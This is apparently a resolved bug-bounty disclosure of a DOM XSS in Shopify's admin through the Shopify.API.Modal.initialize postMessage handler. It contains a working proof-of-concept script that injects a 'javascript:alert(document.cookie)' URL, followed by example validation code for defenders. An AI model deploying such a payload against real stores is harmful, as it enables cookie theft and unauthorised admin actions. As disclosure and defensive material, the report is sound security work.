DOM XSS via Shopify.API.Modal.initialize
Low
## Vulnerability Details
Similar to #422043 and #576532.
Payload (based on #576532):
```html
<script>
  function attack(){
    const ctx = window.open(location.origin+'/admin/themes', '_blank')
    const json = {
      message: "Shopify.API.Modal.initialize",
      data: {
        src: ""
      }
    }
    let interval;
    interval = setInterval(function(){
      if (window.attackSuccess) {
        clearInterval(interval)
      } else {
        ctx.postMessage(JSON.stringify(json)) // data.src == ""
        json.data.src = "javascript:alert(document.cookie)"
        ctx.postMessage(JSON.stringify(json))
      }
    }, 500)
  }
  attack()
</script>
<a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>
```
## Impact
Perform unauthorized actions on a store admin on any embedded apps.
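A receiver-side check that rejects both messages sent by the payload above, as an added example (not Shopify's code and not part of the original report). The function name, the origin allowlist and the sample origins are assumptions.

```javascript
// Added example: validation for a postMessage receiver that opens a modal
// iframe. ALLOWED_ORIGINS, validateModalMessage and the example.com origins
// are hypothetical names and constructed values.

const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

// Returns a safe absolute URL string for the modal iframe, or null to reject.
function validateModalMessage(event, baseOrigin) {
  // 1. Only accept messages from origins the admin page has registered.
  if (!ALLOWED_ORIGINS.has(event.origin)) return null;

  // 2. The payload arrives as a JSON string; malformed input is rejected.
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return null;
  }
  if (!msg || msg.message !== 'Shopify.API.Modal.initialize') return null;

  const src = msg.data && msg.data.src;
  if (typeof src !== 'string' || src.trim() === '') return null;

  // 3. Parse with the URL API (which normalises whitespace and control
  //    characters the same way the browser does) and allow only http(s),
  //    so javascript:, data: and similar schemes never reach an iframe src.
  let url;
  try {
    url = new URL(src, baseOrigin);
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  return url.href;
}
```

The caller assigns the returned string to the iframe `src` only when it is non-null and ignores the message otherwise.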
Report Stats
- Report ID: 602767
- State: Closed
- Substate: resolved
- Upvotes: 34